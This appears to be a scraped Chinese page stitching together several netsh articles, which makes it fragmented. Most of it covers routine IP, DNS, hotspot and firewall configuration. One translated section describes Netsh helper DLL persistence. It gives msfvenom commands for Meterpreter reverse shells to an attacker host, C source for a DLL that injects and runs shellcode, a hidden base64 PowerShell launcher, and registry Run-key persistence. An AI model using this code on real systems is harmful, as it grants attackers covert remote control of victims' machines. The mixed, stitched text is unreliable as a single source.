精华内容
下载资源
问答
  • C:\Documents and Settings>netsh netsh>interface netsh interface>ip netsh interface ip>add address "本地连接" 1 确定 netsh interface ip> C:\Documents and Settings>nets
  • netsh(Network Shell)是一个windows系统本身提供的功能强大的网络配置命令行工具,可用来修改windows的ip,网关,dns,防火墙等信息. 1.netsh修改ip,网关,dns: (1)备份网络配置: netsh dump > 路径 (2)设置静态ip: ...
  • 进攻性Netsh助手 本机Microsoft命令行实用程序NetShell能够加载自定义帮助程序DLL,以扩展其功能。 攻击者可能利用此内置功能来制作恶意帮助程序DLL,以保持持久性。 帮助程序仅在netsh.exe启动时执行。 默认情况下...
  • netsh

    2019-07-02 15:36:00
    NetSH (Network Shell) 是windows系统本身提供的功能强大的网络配置命令行工具。 导出配置脚本:netsh -c interface ip dump > c:\interface.txt 导入配置脚本:netsh -f c:\interface.txt 外文名Network Shell...
    NetSH (Network Shell) 是windows系统本身提供的功能强大的网络配置命令行工具。 导出配置脚本:netsh -c interface ip dump > c:\interface.txt 导入配置脚本:netsh -f c:\interface.txt
    外文名
    Network Shell
    简    称
    netsh
    类    别
    网络配置命令行工具
    导入配置脚本
    netsh -f c:\interface.txt
     

    命令编辑

    C:\>netsh ?
    用法: netsh [-a AliasFile] [-c Context] [-r RemoteMachine] [-u [DomainName]UserName] [-p Password | *] [Command | -f ScriptFile]
    进入NetSH环境后,在根级目录用exec命令也可以加载一个配置脚本。还有对winsock、route、ras等网络服务的配置也可以通过Netsh的内置命令操作。
    C:\>netsh
    netsh>help
    下列指令有效:
    此上下文中的命令:
    .. - 移到上一层上下文级。
    ? - 显示命令列表。
    abort - 丢弃在脱机模式下所做的更改。
    add - 在项目列表上添加一个配置项目。
    alias - 添加一个别名
    bridge - 更改到 `netsh bridge' 上下文。
    bye - 退出程序。
    commit - 提交在脱机模式中所做的更改。
    delete - 在项目列表上删除一个配置项目。
    diag - 更改到 `netsh diag' 上下文。
    dump - 显示一个配置脚本。
    exec - 运行一个 脚本文件
    exit - 退出程序。
    help - 显示命令列表。
    interface - 更改到 `netsh interface' 上下文。
    offline - 将当前模式设置成脱机。
    online - 将当前模式设置成联机。
    popd - 从 堆栈上打开一个上下文。
    pushd - 将当前上下文放推入堆栈。
    quit - 退出程序。
    ras - 更改到 `netsh ras' 上下文。
    routing - 更改到 `netsh routing' 上下文。
    set - 更新配置设置。
    show - 显示信息
    unalias - 删除一个别名。
    winsock - 更改到 `netsh winsock' 上下文。
    下列的子上下文可用:
    bridge diag interface ras routing winsock
    若需要命令的更多帮助信息,请键入命令,
    后面跟 ?。
    netsh>

    概述编辑

    Netsh 是命令行脚本实用工具,它允许从本地或远程显示或修改当前正在运行的计算机的网络配置。
    Netsh 还提供了一个脚本功能,对于指定计算机,可以通过此功能以 批处理模式运行一组命令。为了存档或配置其他服务器,Netsh 也可以将配置脚本保存在文本文件中。
    Netsh 命令的强大,有经验的管理员都不会怀疑;以前有很多介绍netsh命令的文章,今天我们从另一方面感受一下netsh命令的神奇。

    配置示例:管理学校机房编辑

    网络环境:
    ADSL接入,通过ISP上网,
    上网服务器:win2ks+isa2k
    IP:192.168.0.1
    subnetmask:255.255.255.0
    DNS为ISP的DNS IP:202.101.10.10
    客户机全部win2kpro(并装有 还原卡
    IP:192.168.0.2---192.168.0.102
    subnetmask:255.255.255.0
    网关和DNS都为 代理服务器的IP:192.168.0.1并且都装了ISA的 防火墙客户端软件。
    学校规定:学生 帐号登陆不能上Internet,而老师通过自己帐号登陆则可以连接Internet;
    多数情况下上网权限的控制,都是通过IP地址来实现(当然,ISA在AD的支持下是可以通过帐户来实现上网权限的控制,这不是本文讨论范围内),也就是说同一台电脑,学生用过后,如果老师使用时要Internet的话,就必须更改计算机的IP地址,但有些菜鸟老师更改,都教了N次了,还是不会......
    在默认情况下,客户机是全部不能上internet的,ISA的规则上是禁止192.168.0.2---192.168.0.102的IP上internet,另外在ISA再创建一规则,允许192.168.0.103-192.168.0.203上internet (这不是本文的重点,如果有需要,大家可以查看相关资料)。
    netsh派上用场了,我们客户机PC18上运行CMD进入 MS-DOS,输入
    netsh -c interface ip dump > c:\NetPC.TXT
    (该命令是显示当前”本地连接" 的接口IP 配置,并保存在NetPC.TXT文本文件中)
    查看一下c:\NetPC.TXT这个文件,显示的是当前” 本地连接”的接口的IP配置,是否跟用ipconfig /all命令,看到的一样的。
    {
    TPYE c:\NetPC.TXT
    # ----------------------------------
    # 接口 IP 配置
    # ----------------------------------
    pushd interface ip
    # "本地连接" 的接口 IP 配置
    set address name="本地连接" source=static addr=192.168.0.18 mask=255.255.255.0
    set address name="本地连接" gateway=192.168.0.1 gwmetric=0
    set dns name="本地连接" source=static addr=192.168.0.1 register=PRIMARY
    add dns name="本地连接" addr=202.101.10.10 index=2
    set wins name="本地连接" source=static addr=none
    popd
    # 接口 IP 配置结束
    }
    我们打开NetPC.TXT这个文件,把“addr=192.168.0.18”的IP改为“addr=192.168.0.118”,再保存。
    然后,在老师帐户的桌面上创建一个IP.BAT文件,内容输入“netsh -f c:\NetPC.TXT”(注意文件的路径,我们刚才是把NetPC.TXT放在C盘根目录下)。
    用老师的帐户登陆后,双击桌面上的IP.BAT文件,我们用ipconfig /all看看结果,显示IP地址换成192.168.0.118了,别的配置都没有变。
    我们知道192.168.0.103―192.168.0.203的IP地址是可以上网的。也就是说,如果老师想上网的话,只要双击IP.BAT这个文件就可以了;
    以上的设置是在PC18这台机器上做的,如果我们要在别的机器上设置,我们只在把NetPC.TXT这个文件的里的IP地址换成192.168.0.103-192.168.0.203范围内的IP(当然要保证使用的IP是唯一的,以免产生IP冲突),再新建一个IP.BAT文件,内容可以一样,不过要注意NetPC.TXT这个文件的路径;补允一点,老师帐户都为管理员组,学生帐户为普通用户组。
    通过以上设置,基本上达到我们的目的,老师上机的时候,只要双击桌面上IP.BAT这个文件,IP地址就会换成192.168.0.103―192.168.0.203这个网段的IP,也就是说可以上网了,电脑重启,因为有 还原卡,机器又会被变成192.168.0.2―192.168.0.102这个网段的IP,也就不能上网了。通过netsh这个命令,我们能感觉到他的强大,可以为我们免去一些烦琐的事情。

    配置示例:笔记本设置wifi热点编辑

    在笔记本命令行下,利用netsh命令设置无线热点:
    1、netsh wlan show drivers //判断支持的承载网络:是
    2、netsh wlan set hostednetwork mode=allow ssid=热点名字 key=热点密码 //mode=allow启用虚拟WiFi网卡;mode=disallow可以直接禁用虚拟WiFi网卡。
    3、netsh wlan start hostednetwork //启动承载网络
    4、设置Internet共享。
    5、netsh wlan show hostednetwork //显示无线网络信息

    用法编辑

    [Note] netsh命令详解
    1>查看网络配置
    netsh interface ip show {选项}
    {选项}可以是:
    address - 显示 IP 地址配置。
    config - 显示 IP 地址和更多信息。
    dns - 显示 DNS 服务器地址。
    icmp - 显示 ICMP 统计。
    interface - 显示 IP 接口统计。
    ipaddress - 显示当前 IP 地址
    ipnet - 显示 IP 的网络到媒体的映射。
    ipstats - 显示 IP 统计。
    joins - 显示加入的多播组。
    offload - 显示 卸载信息。
    tcpconn - 显示 TCP 连接。
    tcpstats - 显示 TCP 统计。
    udpconn - 显示 UDP 连接。
    udpstats - 显示 UDP 统计。
    wins - 显示 WINS 服务器地址。
    2>配置接口IP/ 网关IP
    netsh interface ip set address "本地连接" static 10.1.2.90 255.255.255.0 10.1.2.254 1
    C:>netsh interface ip show config
    接口 "本地连接" 的配置
    DHCP enabled: 否
    IP 地址: 10.1.2.90
    子网掩码: 255.255.255.0
    默认网关: 10.1.2.254
    GatewayMetric: 1
    InterfaceMetric: 0
    静态配置的 DNS 服务器: 202.99.160.68
    202.99.166.4
    静态配置的 WINS 服务器: 无
    用哪个前缀注册: 只是主要
    3>配置自动换取IP地址,DNS地址及wins地址
    netsh interface ip set address "本地连接" dhcp
    netsh interface ip set dns "本地连接" dhcp
    netsh interface ip set wins "本地连接" dhcp
    4>配置静态IP地址,DNS地址及wins地址
    netsh interface ip set address "本地连接" static 10.1.2.90
    netsh interface ip set dns "本地连接" static 202.99.160.68
    netsh interface ip set wins "本地连接" static 10.1.2.200
    5>查看网络配置文件
    C:>netsh -c interface dump
    #========================
    # 接口配置
    #========================
    pushd interface
    reset all
    popd
    # 接口配置结束
    #========================
    # 接口配置
    #========================
    pushd interface ipv6
    uninstall
    popd
    # 接口配置结束
    # ----------------------------------
    # ISATAP 配置
    # ----------------------------------
    pushd interface ipv6  isatap
    popd
    # ISATAP 配置结束
    # ----------------------------------
    # 6to4 配置
    # ----------------------------------
    pushd interface ipv6 6to4
    reset
    popd
    # 6to4 配置结束
    #=============
    # 端口代理配置
    #=============
    pushd interface portproxy
    reset
    popd
    # 端口代理配置结束
    # ----------------------------------
    # 接口 IP 配置
    # ----------------------------------
    pushd interface ip
    # "本地连接" 的接口 IP 配置
    set address name="本地连接" source=static addr=10.1.2.90 mask=255.255.255.0
    set address name="本地连接" gateway=10.1.2.254 gwmetric=1
    set dns name="本地连接" source=static addr=202.99.160.68 register=PRIMARY
    add dns name="本地连接" addr=202.99.166.4 index=2
    set wins name="本地连接" source=static addr=none
    popd
    # 接口 IP 配置结束
    6>导出网络配置文件
    netsh -c interface dump > d:\1.txt
    7>导入网络配置文件
    netsh -f d:\1.txt
    netsh exec d:\2.txt
    Netsh命令行设置IP与DNS
    1.设置动态IP(DHCP自动获取IP)
    [span]netsh interface ip set address "本地连接" dhcp
    2.设置指定的IP,此处以设置本机IP为10.16.15.226,子网掩码为255.255.255.0,网关IP为10.16.15.1为例
    [span]netsh interface ip set address "本地连接" static 10.16.15.226 255.255.255.0 10.16.15.1
    3.设置动态DNS(DHCP自动获取DNS)
    [span]netsh interface ip set dns "本地连接" dhcp
    4.设置指定的DNS,此处以设置DNS为210.45.240.10为例
    [span]netsh interface ip set dns "本地连接"static 210.45.240.10

    防火墙编辑

    系统防火墙

    打开 命令提示符输入输入命令“netsh firewall show state”然后回车可查看 防火墙的状态,从显示结果中可看到防火墙各功能模块的禁用及启用情况。命令“netsh firewall set opmode disable”用来禁用系统防火墙,相反命令“netsh firewall set opmode enable”可启用防火墙。

    启用一个程序

    旧命令 : 新命令:
    netsh firewall add allowedprogram C: \ MyApp \ MyApp.exe "My Application" ENABLE
    netsh advfirewall firewall add rule name=”My Application” dir=in action=allow program=”C:\MyApp\MyApp.exe” enable=yesnetsh advfirewall firewall add rule name = "My Application" dir = in action = allow program = "C: \ MyApp \ MyApp.exe" enable = yes
    netsh firewall add allowedprogram program=C:\MyApp\MyApp.exe name="My Application" mode=ENABLE scope=CUSTOM addresses=157.60.0.1,172.16.0.0/16,LocalSubnet profile=Domainnetsh firewall add allowedprogram program = C: \ MyApp \ MyApp.exe name = "My Application" mode = ENABLE scope = CUSTOM addresses = 157.60.0.1,172.16.0.0 / 16, LocalSubnet profile = Domain
    netsh advfirewall firewall add rule name=”My Application” dir=in action=allow program=”C:\MyApp\MyApp.exe” enable=yes remoteip=157.60.0.1,172.16.0.0/16,LocalSubnet profile=domainnetsh advfirewall firewall add rule name = "My Application" dir = in action = allow program = "C: \ MyApp \ MyApp.exe" enable = yes remoteip = 157.60.0.1,172.16.0.0 / 16, LocalSubnet profile = domain
    netsh firewall add allowedprogram program=C:\MyApp\MyApp.exe name="My Application" mode=ENABLE scope=CUSTOM addresses=157.60.0.1,172.16.0.0/16,LocalSubnet profile=ALLnetsh firewall add allowedprogram program = C: \ MyApp \ MyApp.exe name = "My Application" mode = ENABLE scope = CUSTOM addresses = 157.60.0.1,172.16.0.0 / 16, LocalSubnet profile = ALL
    运行以下命令:
    netsh advfirewall firewall add rule name=”My Application” dir=in action=allow program=”C:\MyApp\MyApp.exe” enable=yes remoteip=157.60.0.1,172.16.0.0/16,LocalSubnet profile=domainnetsh advfirewall firewall add rule name = "My Application" dir = in action = allow program = "C: \ MyApp \ MyApp.exe" enable = yes remoteip = 157.60.0.1,172.16.0.0 / 16, LocalSubnet profile = domain
    netsh advfirewall firewall add rule name=”My Application” dir=in action=allow program=”C:\MyApp\MyApp.exe” enable=yes remoteip=157.60.0.1,172.16.0.0/16,LocalSubnet profile=privatenetsh advfirewall firewall add rule name = "My Application" dir = in action = allow program = "C: \ MyApp \ MyApp.exe" enable = yes remoteip = 157.60.0.1,172.16.0.0 / 16, LocalSubnet profile = private
    有关如何添加 防火墙规则的详细信息对于运行以下命令: netsh advfirewall firewall add rule?

    参考文章:

    1、netsh

    转载于:https://www.cnblogs.com/AlanWilliamWalker/p/11121047.html

    展开全文
  • xp下用netsh禁用启用网卡 在XP系统中不支持netsh interface set interface name命令扩展,所以此命令是无法正常运行的,提取2003下的ifmon.dll文件覆盖,就可以用了。 winxp下使用: netsh interface set ...
  • Netsh_TechnicalReference.chm

    2019-10-24 11:06:35
    微软的NETSH技术文档咯,入门必备,学无止境,用到了再看也来得及
  • netsh 命令祥解

    2015-05-21 12:39:28
    netsh 命令祥解提供大家学习资料,方便电脑爱好者查寻有关nets命令祥解
  • 微软Windows的netsh是一个命令行脚本实用工具。使用netsh工具 ,可以查看或更改本地计算机或远程计算机的网络配置。不仅可以在本地计算机上运行这些命令,而且可以在网络上的远程计算机上运行。
  • netsh实现端口转发

    2019-01-21 10:00:53
    微软Windows的netsh是一个命令行脚本实用工具。使用netsh工具 ,可以查看或更改本地计算机或远程计算机的网络配置。不仅可以在本地计算机上运行这些命令,而且可以在网络上的远程计算机上运行。
  • vc编写的ip配置工具,调用dos命令netsh实现,还不完善,一起学习
  • 有时候不想暴露真实服务器IP和端口,所以就借用了端口转发软件。翻遍市面上源码,大都是需要运行着软件才能工作,这些软件并发性能不高,可能堵塞,数据丢失,崩溃情况。 最后发现windows 本身就支持端口转发,执行...
  • netsh配置staticip与dhcp

    2014-11-27 15:06:59
    采用windows的netsh工具编写配置静态ip和dhcp的脚本
  • Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红队可以使用此工具来加载任意DLL,以实现代码...

    Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红队可以使用此工具来加载任意DLL,以实现代码执行并因此实现持久性。但是,此技术的实现需要本地管理员级别的特权。

    可以通过Metasploit Framework 的“ msfvenom ”实用程序生成任意DLL文件。

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.21 LPORT=4444 -f dll > /tmp/pentestlab.dll

     生成恶意DLL

    可以通过Meterpreter的上载功能或命令和控制(C2)支持的任何其他文件传输功能将DLL文件传输到目标主机。

     上载恶意DLL

    “添加帮手”可以用来注册用的DLL “netsh的 ”实用工具。

    netsh
    add helper path-to-malicious-dll

     添加助手DLL

    每次netsh实用程序启动时,都会执行DLL,并且将建立通信。

     Netsh Helper DLL – Meterpreter

    但是,默认情况下,netsh没有计划自动启动。创建将在Windows启动期间执行实用程序的注册表项将在主机上创建持久性。这可以直接从Meterpreter会话或Windows Shell中完成。

    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh"
    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh'

     创建注册表运行密钥

    注册表运行键的替代方法是,可以使用多种其他方法来启动实用程序,例如创建服务或计划任务。

    击败一家总部位于荷兰的IT安全公司,该公司率先在其Github存储库中发布概念证明DLL 。DLL是由Marc Smeets用C编写的,可以对其进行修改以包含自定义的shellcode。Metasploit Framework实用程序“ msfvenom ”可用于生成各种语言的shellcode。

    msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp -b '\x00' -f c

     C Shellcode – Netsh

    可以将生成的shellcode注入到Netsh Helper DLL代码中。

    #include <stdio.h>
    #include <windows.h> // only required if you want to pop calc
    
    #ifdef _M_X64
    unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb";
    #else
    unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb";
    #endif
    
    // Start a separate thread so netsh remains useful.
    DWORD WINAPI ThreadFunction(LPVOID lpParameter)
    {
        LPVOID newMemory;
        HANDLE currentProcess;
        SIZE_T bytesWritten;
        BOOL didWeCopy = FALSE;
        // Get the current process handle 
        currentProcess = GetCurrentProcess();
        // Allocate memory with Read+Write+Execute permissions 
        newMemory = VirtualAllocEx(currentProcess, NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (newMemory == NULL)
            return -1;
        // Copy the shellcode into the memory we just created 
        didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&buf, sizeof(buf), &bytesWritten);
        if (!didWeCopy)
            return -2;
        // Yay! Let's run our shellcode! 
        ((void(*)())newMemory)();
        return 1;
    }
    
    // define the DLL handler 'InitHelpderDll' as required by netsh.
    // See https://msdn.microsoft.com/en-us/library/windows/desktop/ms708327(v=vs.85).aspx
    extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
    {
        //make a thread handler, start the function as a thread, and close the handler 
        HANDLE threadHandle;
        threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
        CloseHandle(threadHandle);
        // simple testing by starting calculator
        system ("start calc");
    
        // return NO_ERROR is required. Here we are doing it the nasty way
        return 0;
    }

     Netsh帮助程序DLL

    与上述方法类似,rtcrowley在他的Github存储库中发布了该方法的PowerShell版本。以下代码可用于执行PowerShell Base64编码的有效负载,并支持两个选项。

    #include <stdio.h>
    #include <windows.h>
    
    DWORD WINAPI YahSure(LPVOID lpParameter)
    {
        //Option 1: Quick and simple. Opens 1 PS proc & briefly displays window. Set payload to b64 unicode.
        system("start C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -win hidden -nonI -nopro -enc \
                    SQBmACgAJABQAFMAVgBlAHIAcwBJAE8AbgBUAEEAQgBsAGUALgBQAFMAVgBFAFIAcwBpAG8ATgAuACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==");
    
        //Option 2: Execute loaded b64 into a reg key value. Will spin up a few etra procs, but will not open an extra window.
        //system("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c \
                $x=((gp HKLM:SOFTWARE\\Microsoft\\Notepad debug).debug); \
                    powershell -nopro -enc $x 2> nul");
        return 1;
    
    }
    
    //Custom netsh helper format
    extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
    {
        HANDLE hand;
        hand = CreateThread(NULL, 0, YahSure, NULL, 0, NULL);
        CloseHandle(hand);
    
        return NO_ERROR;
    }

     Netsh Helper DLL – PowerShell方法

    执行“ netsh ”实用程序并使用“ add helper ”命令加载系统中的两个DLL都将执行集成的有效负载。

    netsh
    add helper C:\Users\pentestlab\Desktop\NetshHelperBeacon.dll
    add helper C:\Users\pentestlab\Desktop\NetshPowerShell.dll

     Netsh助手DLL

    Empire和Metasploit的“ multi / handler ”模块可用于接收来自两个DLL的通信。

    Netsh助手DLL PowerShell

     Netsh助手DLL Meterpreter

    当执行“ 添加帮助程序 ”命令以加载DLL文件时,将在以下位置创建注册表项。

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh

     Netsh注册表项

    应该注意的是,某些可能安装在受感染系统上的VPN客户端可能会自动“ netsh ” 启动,因此可能不需要使用其他方法进行持久化。

    译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。

    原文地址:https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/

    展开全文
  • netsh命令

    2019-03-26 16:57:00
    命令:netsh interface ip 1.查看帮助信息 C:/>netsh interface ip /? 下列指令有效: 此上下文中的命令: ? - 显示命令列表。 add - 向表中添加一个配置项目。 delete - 从表中删除一个配置项目。 ...

    命令:netsh interface ip

    1.查看帮助信息

    C:/>netsh interface ip /?

     

    下列指令有效:

     

    此上下文中的命令:

    ?              - 显示命令列表。

    add            - 向表中添加一个配置项目。

    delete         - 从表中删除一个配置项目。

    dump           - 显示一个配置脚本。

    help           - 显示命令列表。

    reset          - 复位 TCP/IP 及相关的组件到干净的状态。

    set            - 设置配置信息。

    show           - 显示信息。

     

    2.导出当前配置脚本

    C:/>netsh interface ip dump >interface.txt

     

    3.配置IP信息

    3.1 添加IP配置信息(add address)

    (1)查看帮助信息

    netsh interface ip>add address /?

     

    用法: add address [name=]<string> [[addr=]IP address [mask=]IP subnet mask]

           [[gateway=]IP address [gwmetric=]integer]

    (2)添加IP、mask、gateway信息

    netsh interface ip>add address name="本地连接" addr=192.168.1.123 mask=255.255.2

    55.0 gateway=192.168.1.254 gwmetric=1

     

    3.2修改IP配置信息(set address)

    (1)查看帮助信息

    netsh interface ip>set address /?

     

    用法: set address [name=]<string>

           [[source=]dhcp |

            [source=] static [addr=]IP address [mask=]IP subnet mask]

           [[gateway=]<IP address>|none [gwmetric=]integer]

    (2)静态设置IP

    完整命令:

    ①netsh interface ip>set address name="本地连接" source=static addr=211.67.17.120

    mask=255.255.255.0 gateway=211.67.17.254 gwmetric=1

     

    当然,name=、source=、addr=、mask=、gateway=、gwmetric= 可以省略,写成如下形式(必须按照顺序)

    ②netsh interface ip>set address "本地连接" static 211.67.17.120 255.255.255.0 211

    .67.17.254 1

     

    也可以写成如下形式:

    ③netsh interface ip>set address "本地连接" static 211.67.17.120 255.255.255.0

    ④netsh interface ip>set address name="本地连接" source=static addr=211.67.17.123

    mask=255.255.255.0

    ⑤netsh interface ip>set address "本地连接" static gateway=211.67.17.254 gwmetric=1

    其中,③④是等价的,⑤必须写上gateway=、 gwmetric=之类的

    建议:最好将“name=、source=、addr=、mask=、gateway=、gwmetric=”等都写上,这样一目了然,不容易出错。

     

    (3)动态设置IP

    netsh interface ip>set address name="本地连接" source=dhcp

     

    3.3删除IP配置信息(delete address)

    (1)查看帮助信息

    netsh interface ip>delete address /?

     

    用法: delete address [name=]<string> [[addr=]IP address] [[gateway=]IP address|ALL]

     

    (2) 删除网关信息

    netsh interface ip>delete address name="本地连接" gateway=192.168.1.254

     

    注:没有使用 DHCP 的界面必须有一个或多个静态 IP 地址。

     

    4.配置DNS信息

    4.1添加DNS(add dns)

    (1)查看帮助信息

    netsh interface ip>add dns

    用法: add dns [name=]<string> [addr=]<IP address> [[index=]<integer>]

     

    (2)添加DNS

    ①netsh interface ip>add dns name="本地连接" addr=202.114.0.242

     

    ②netsh interface ip>add dns name="本地连接" addr=202.114.0.242 index=1

    若还未设置DNS,①②功能是一样的,都是将202.114.0.242设为首选DNS服务器

     

    ③设置辅助DNS服务器

    netsh interface ip>add dns name="本地连接" addr=202.112.30.131 index=2

    注:默认情况下,新添加的DNS 服务器被添加在列表的结尾

    4.2设置DNS(set dns)

    (1)查看帮助信息

    netsh interface ip>set dns /?

     

    用法: set dns [name=]<string> [source=]dhcp|static [addr=]<IP address>|none

                 [[register=]none|primary|both]

    (2)设置DNS

    netsh interface ip>set dns name="本地连接" source=static addr=202.114.0.242 register=primary

     

    4.3删除DNS(delete dns)

    (1) 查看帮助信息

    netsh interface ip>delete dns /?

     

    用法: delete dns [name=]<string> [[addr=]<IP address>|ALL ]

     

    (2)删除DNS

    ①删除指定DNS

    netsh interface ip>delete dns name="本地连接" addr=202.114.0.242

    注:若删除首选DNS,则原先辅助DNS变为当前首选DNS

     

    ②删除所有DNS:netsh interface ip>delete dns name="本地连接" addr=all

    绑定到某IP: httpcfg set iplisten -i 192.168.0.1  
    查看绑定IP: httpcfg query iplisten 
    删除绑定IP: httpcfg delete iplisten -i 192.168.0.1

    可是windows server 2012没有httpcfg该怎么办呢,还真被我想到办法了,废话不多说直接入正题,因为我想睡觉了:

    先是CMD下输入下列命令,然后回车

    netsh http show iplisten

    果然ECS迁移之前的IP存在这个侦听列表中。那么简单了,用下面这个命令删除

    netsh http delete iplisten ipaddress=迁移前的IP

    转载于:https://www.cnblogs.com/Li-yuan/p/10601296.html

    展开全文
  • Netsh

    2016-05-28 15:04:13
    Netsh的字面意思是网络外壳,其实它是一个命令行实用程序,最初出现于Windows 2000操作系统,它可以帮助管理WINDOWS中的网络设置。此后,微软不断对它进行改进,给它增加了一些新的命令集。例如,在Vista和Server ...

    Netsh的字面意思是网络外壳,其实它是一个命令行实用程序,最初出现于Windows 2000操作系统,它可以帮助管理WINDOWS中的网络设置。此后,微软不断对它进行改进,给它增加了一些新的命令集。例如,在Vista和Server 2008中增加了一套WLAN命令,以提供对802.11无线连接和安全设置的管理功能。现在,Win7和Server 2008 R2中又增加了另外的WLAN命令。

      记住一点,Netsh命令不仅让你配置本地计算机,而且可以使你运用登录脚本配置多台计算机。

      需要记住的另外一方面是,无线网络配置文件是只读的。这种文件是无法通过使用Netsh的WLAN命令进行修改的,但是,这种文件可以导入和导出。通过普通的Windows图形用户界面就可以创建和修改无线网络的配置文件。
    Netsh起步

      在打开命令提示符窗口后,输入Netsh命令,以及需要的子命令。要查看或列示所有的子命令,可以键入Netsh ?。要查看上下文命令,可以在上下文后输入一个问号,例如,Netsh WLAN ?
    详析Windows 7中的WLAN netsh命令

    用于虚拟Wi-Fi的命令

    虚拟Wi-Fi是一个虚拟的无线访问点,你可以在windows 7及Server 2008 R2中创建这种访问点。这个功能在由微软已经放弃的一个VirtualWi-Fi程序早就已经提供。

    你可以指定网络名(SSID),但这个名称会被广播给所有的虚拟无线网络,必须启用WPA2-PSK加密。虚拟无线网络的功能是内置到一个DHCP服务器中的,因而用户们会自动分配得到IP地址。

    要使用虚拟无线网络的特性,用户的无线网络适配器必须用得到了Win7认证的驱动程序。在检测到所支持的适配器后,Windows会自动向网络连接窗口添加一个连接,称为微软的Wi-Fi微端口适配器。

    下面是与这种新的虚拟网络的特性有关的命令:

    Netsh WLAN set hostednetwork: 为无线托管网络进行设置,使用下面的参数:

    mode =

    ssid = 无线网络名称

    key = 你的口令

    keyUsage =

    Netsh WLAN export hostednetworkprofile:将虚拟无线网络的配置文件保存为一个XML文件,使用下面的参数:

    Folder =路径及文件名

    Name =无线网的配置文件

    Netsh WLAN start hostednetwork:启用并启动广播无线托管网络

    Netsh WLAN show hostednetwork: 显示无线托管网络的设置,包括所连接的用户列表

    Netsh WLAN refresh hostednetwork: 为虚拟无线网络设置一个新的WPA2-PSK密钥。 你只需输入这个命令,并且可以使用你自己喜欢的密钥。

    Netsh WLAN stop hostednetwork: 禁用并停止广播虚拟无线网络。

    记住,Windows并不会在计算机从休眠状态恢复或重启之后自动地启动虚拟无线网络。如果你需要启动虚拟网络,必须手动进行。

    软件开发商还必须创建前端的实用程序,或者在其应用程序中使用虚拟无线网络特性。

    为了充分利用虚拟无线网络,你可以配置计算机与连接到虚拟接入点的用户共享其互联网连接(使用Windows的Internet连接共享属性)。

    要启用互联网的连接共享,需要打开网络连接窗口,在与互联网连接的连接上右击,选择“属性”。然后,选择“共享”选项卡,选中“准许其他网络用户通过此计算机的互联网连接进行连接”,从下拉列表框中选择“虚拟无线网络连接”,然后单击“确定”。

    显示设置值的命令

    这些命令并不是让用户进行配置,而是让用户查看某些设置的值:

    Netsh WLAN show createalluserprofile: 可以知道用户是否能够为所有的用户而不是为其自己创建无线配置文件。.

    Netsh WLAN show allowexplicitcreds:在一个用户无法登录到计算机时,是否准许计算机为802.1x使用所存储的用户凭证。

    Netsh WLAN show onlyusegpprofilesforallowednetworks:在实施组策略时,显示组策略的无线配置文件什么时候被准许。

    其它命令

    下面这些Netsh WLAN命令并不属于哪种特定的用途:

    Netsh WLAN reportissues:创建一份无线网络连接问题的故障诊断报告,这份报告位于C:WindowsTracing文件夹下。

    Netsh WLAN set allowexplicitcreds:在一个用户并不登录计算机时,指定是否准许计算机将存储的用户登录凭证用于802.1x认证,使用下面的参数:allow=

    Netsh WLAN set blockperiod:这个命令指定在客户端有了一次不成功的登录企图之后,客户端试图连接到这个网络之前必须等待的分钟数。

    Netsh WLAN set profiletype: 定义计算机的当前用户或所有的用户是否使用无线网络的配置文件。其配置参数如下:

    name =配置文件名

    profiletype =

    更多命令

    前面我们看了几个在win7和Windows Server 2008 R2中初次出现的新命令。其实,还有几个无线网络的命令:

    Netsh WLAN show networks:列示所检测到的全部邻近的无线网络,包括其SSID、认证、加密设置等。

    Netsh WLAN connect: 设法与指定的网络建立一个连接,使用下面的参数:

    ssid = 无线网络名

    name = 配置文件名

    interface = 接口名称

    Netsh WLAN export profile:让用户将一个在WINDOWS图形用户界面中创建的无线配置文件导出到一个XML文件中,如此,你便可以将其导入到其它计算机中或进行备份:

    folder = 路径及文件名

    name = 配置文件名

    interface = 接口名

    下面是一个例子:
    这里写图片描述

    详析Windows 7中的WLAN netsh命令

    Netsh WLAN add profile:让用户从一个XML文件导入无线配置文件

    filename = 路径及文件名

    interface = 接口名

    user = ]

    展开全文
  • netsh端口映射

    2021-05-21 09:31:49
    netsh端口映射 netsh是Windows系统自带的一个命令行工具,内置端口转发功能 因为是自带,所以不会被杀毒软件查杀 netsh操作流程 命令使用 netsh interface portproxy add v4tov4 listenaddress=localaddress ...
  • windows cmd命令netsh命令设置wifi连接

    千次阅读 2021-01-08 15:55:47
    netsh全称是network shell,它包括有线与无线的网络设置,是非常方便的工具 ,而且可以避免调用api的复杂编程,因为api里有一大把复杂的结构,C++资源Com调用等。 连接一个wifi,往往会要求输入密码和设置是否自动...
  • Netsh Winsock reset

    2021-04-20 20:33:57
